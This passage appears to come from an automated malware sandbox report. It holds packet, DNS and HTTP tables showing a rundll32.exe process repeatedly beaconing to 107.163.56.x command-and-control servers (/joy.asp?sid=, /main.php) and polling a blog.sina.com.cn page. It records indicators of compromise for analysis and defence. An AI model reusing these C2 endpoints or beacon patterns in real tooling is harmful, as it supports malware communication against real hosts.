                                                                                                                                                                        Dec 19, 2024 15:46:41.528561115 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.648176908 CET1896349847107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.648257017 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.652415037 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.652764082 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.653532982 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.653573036 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.772516012 CET8049848116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.772598028 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.772763014 CET8049844116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.772815943 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.773075104 CET1896349847107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.773247004 CET1896349849107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.773252010 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.773299932 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.773751974 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.894203901 CET8049848116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.894682884 CET1896349849107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.064074993 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.064116955 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.064125061 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.219966888 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.221236944 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.236319065 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.340899944 CET1896349850107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.341866970 CET1896349851107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.342317104 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.342484951 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.342487097 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.342596054 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.357253075 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.357429981 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.357618093 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.462362051 CET1896349850107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.462398052 CET1896349851107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.477220058 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:44.107714891 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:44.107927084 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.110707998 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.110750914 CET44349853116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:44.110847950 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.111535072 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.111553907 CET44349853116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.220248938 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.220304012 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.220324993 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.344710112 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.344769955 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.344909906 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.345016003 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.467216969 CET1896349854107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467253923 CET1896349855107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467274904 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467375040 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467381001 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467387915 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.467431068 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467531919 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467609882 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.467701912 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467892885 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.589394093 CET1896349854107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.589639902 CET1896349855107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.589756012 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:48.311642885 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:48.311762094 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.334960938 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.335016012 CET44349857116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:48.335091114 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.335483074 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.335494995 CET44349857116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:49.657000065 CET665849833107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:49.657114029 CET498336658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:46:49.793963909 CET498586658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:46:49.914196968 CET665849858107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:49.914294004 CET498586658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:46:49.914764881 CET498586658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:46:50.034431934 CET665849858107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:50.349687099 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:50.349736929 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.349756956 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.351196051 CET4985918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.470736980 CET1896349859107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:50.470843077 CET4985918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.482780933 CET4985918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.496740103 CET4986018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.603751898 CET1896349859107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:50.617999077 CET1896349860107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:50.618263960 CET4986018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.618869066 CET4986018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:50.738507032 CET1896349860107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:47:11.814074039 CET665849858107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:47:11.814129114 CET498586658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:47:12.377253056 CET1896349859107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:47:12.377324104 CET4985918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:47:12.516796112 CET1896349860107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:47:12.516865969 CET4986018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:47:18.310847044 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:47:18.310911894 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:47:58.751765966 CET497186658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:47:58.871602058 CET665849718107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:48:20.908514977 CET497456658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:48:21.028791904 CET665849745107.163.56.251192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:48:43.283144951 CET497696658192.168.2.11107.163.56.251
                                                                                                                                                                        Dec 19, 2024 15:48:43.402744055 CET665849769107.163.56.251192.168.2.11

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 19, 2024 15:44:43.040047884 CET5413553192.168.2.111.1.1.1
                                                                                                                                                                        Dec 19, 2024 15:44:43.177288055 CET53541351.1.1.1192.168.2.11

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 19, 2024 15:44:43.040047884 CET192.168.2.111.1.1.10xa47cStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 19, 2024 15:44:18.897058010 CET1.1.1.1192.168.2.110xf60cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2024 15:44:18.897058010 CET1.1.1.1192.168.2.110xf60cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2024 15:44:43.177288055 CET1.1.1.1192.168.2.110xa47cNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2024 15:44:43.177288055 CET1.1.1.1192.168.2.110xa47cNo error (0)blogx.sina.com.cn116.133.8.92A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2024 15:46:21.533853054 CET1.1.1.1192.168.2.110x57ecNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 19, 2024 15:46:21.533853054 CET1.1.1.1192.168.2.110x57ecNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • blog.sina.com.cn
                                                                                                                                                                        • 107.163.56.231:18530
                                                                                                                                                                        • 107.163.56.110:18530
                                                                                                                                                                        • 107.163.56.232:18963

                                                                                                                                                                        HTTP Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.1149705107.163.56.231185301232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:11.584388971 CET170OUTGET //joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@ HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible)
                                                                                                                                                                        Host: 107.163.56.231:18530
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.1149706107.163.56.110185301232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:11.584470034 CET185OUTGET /u1129.html HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.110:18530
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.1149722107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:39.858464003 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.1149723107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:39.861032009 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.1149726116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.298105001 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.1149728107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.856717110 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.1149729116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.971196890 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:44:45.672321081 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:44:45 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.1149730107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.972687006 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.1149733107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:48.035053015 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.1149734107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:48.378560066 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        10192.168.2.1149736116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:49.684655905 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        11192.168.2.1149737107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:51.861542940 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        12192.168.2.1149738107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:51.993258953 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        13192.168.2.1149739116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:51.993359089 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        14192.168.2.1149740107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:55.998133898 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        15192.168.2.1149741107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:56.164062023 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        16192.168.2.1149742116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:56.164269924 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:44:57.873430967 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:44:57 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        17192.168.2.1149746107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:00.123146057 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        18192.168.2.1149747107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:00.240134954 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        19192.168.2.1149748116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:00.256176949 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:02.036578894 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:01 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        20192.168.2.1149750107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:04.122564077 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        21192.168.2.1149751107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:04.235218048 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
